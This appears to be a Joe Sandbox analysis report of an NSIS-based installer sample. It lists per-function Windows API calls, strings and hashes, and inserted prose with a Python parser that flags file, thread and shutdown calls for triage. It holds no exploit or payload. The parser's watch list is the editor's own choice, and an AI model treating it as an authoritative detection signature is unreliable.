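The `ref` address is what you carry into the disassembly or the control-flow graph above; the subcall address tells you the hit was attributed to a shared helper rather than to the function being listed, which matters when you are deciding which function actually performs the suspicious call.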
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                              • CloseClipboard.USER32 ref: 0040549A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                              • String ID: New install of "%s" to "%s"${
                                                                                              • API String ID: 2110491804-1641061399
                                                                                              • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                              • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                              Control-flow Graph: function at 004038AF (basic blocks 4038af through 403c8b). The graph rendering and its Executed/Not Executed legend are not reproduced here; the APIs called from those blocks are listed below.
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                              • API String ID: 2435955865-3712954417
                                                                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
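Every API line in these listings has the same shape: a bullet, `Name.MODULE(args), ref: address`, with calls made by a callee prefixed by `Part of subcall function <addr>:`, and with string arguments printed unquoted (so a format string such as `RemoveDirectory("%s")` can itself contain commas and parentheses). The Python below is an added example written for this page, not Joe Sandbox code: it parses lines of that shape into records, splits arguments only on top-level commas, and pulls out the non-hex arguments (paths like `\Temp` and `~nsu.tmp` in the function above) and the file-system, thread and shutdown calls a triage pass wants to see first. The sample trace is constructed from lines of the same shape, and the WATCH list of API names is the editor's own triage choice, not a report signature.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample (not a live report): API-trace lines in the report's shape.
# "\\Temp" is the Python escape for the single backslash the report prints.
SAMPLE_TRACE = """\
• SetErrorMode.KERNELBASE(00008001), ref: 004038D9
• OleInitialize.OLE32(00000000), ref: 004038E0
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
• GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
• lstrcatW.KERNEL32(004E30C8,\\Temp), ref: 00403A4D
• lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
• CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
• CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
"""

# One trace line: optional subcall prefix, Name.MODULE, optional (args), ref: addr.
# "(?P<args>.*)" is greedy so nested parentheses inside a string argument are kept.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")  # a raw 32-bit argument value

# Editor's triage watch list (assumption, not a Joe Sandbox signature).
WATCH = {"CreateDirectoryW", "CopyFileW", "DeleteFileW", "MoveFileW",
         "CreateThread", "ExitWindowsEx", "SetClipboardData"}


@dataclass
class ApiCall:
    name: str
    module: str            # module the call resolved to (KERNEL32, KERNELBASE, ...)
    ref: str               # call-site address from "ref:"
    args: List[str] = field(default_factory=list)
    subcall: Optional[str] = None  # address of the callee that made the call


def split_args(raw: str) -> List[str]:
    """Split on top-level commas only; commas inside quotes or parentheses
    belong to an unquoted string argument and must not split it."""
    out, buf, depth, in_quote = [], [], 0, False
    for ch in raw:
        if ch == '"':
            in_quote = not in_quote
        elif not in_quote:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth = max(depth - 1, 0)
            elif ch == "," and depth == 0:
                out.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    if buf or out:
        out.append("".join(buf).strip())
    return out


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return ApiCall(m.group("name"), m.group("module"), m.group("ref").upper(),
                   split_args(raw) if raw else [], m.group("sub"))


def parse_trace(text: str) -> List[ApiCall]:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def string_args(calls: List[ApiCall]) -> List[str]:
    """Arguments printed as text rather than as a 32-bit hex value or '?':
    paths, file names and format strings, the part worth reading in triage."""
    return [a for c in calls for a in c.args if a != "?" and not HEX_RE.fullmatch(a)]


def flag_calls(calls: List[ApiCall], watch=WATCH) -> List[ApiCall]:
    return [c for c in calls if c.name in watch]


def calls_per_module(calls: List[ApiCall]) -> Counter:
    return Counter(c.module for c in calls)


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for c in flag_calls(calls):
        print(f"{c.ref} {c.module}!{c.name}({', '.join(c.args)})")
    print("string args:", string_args(calls))
    print("per module:", dict(calls_per_module(calls)))
```

Feeding the whole APIs list of a function through `parse_trace` and reading `string_args` first is usually faster than scanning the raw bullets: in the function above it reduces to `\Temp` and `~nsu.tmp` next to a `CreateDirectoryW`/`CopyFileW`/`ExitWindowsEx` sequence, which is what identifies the block as the installer's relaunch-from-Temp path.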
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: jF
                                                                                              • API String ID: 2295610775-3349280890
                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                              Control-flow Graph: function at 004015A0 (basic blocks 4015a0 through 4030f2). The graph rendering and its Executed/Not Executed legend are not reproduced here; the APIs called from those blocks are listed below.
                                                                                              APIs
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                              Strings
                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                              • Call: %d, xrefs: 0040165A
                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                              • Jump: %d, xrefs: 00401602
                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                              • BringToFront, xrefs: 004016BD
                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                              • API String ID: 2872004960-3619442763
                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                              Control-flow Graph (graph rendering not reproduced; function starting at 004054A5, basic blocks 4054a5-405955, nodes marked Executed / Not Executed in the original)
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3282139019-0
                                                                                              • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                              • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                              Control-flow Graph (graph rendering not reproduced; function starting at 00405958, basic blocks 405958-405c6a, nodes marked Executed / Not Executed in the original)
                                                                                              APIs
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                              • API String ID: 608394941-2746725676
                                                                                              • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                              • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
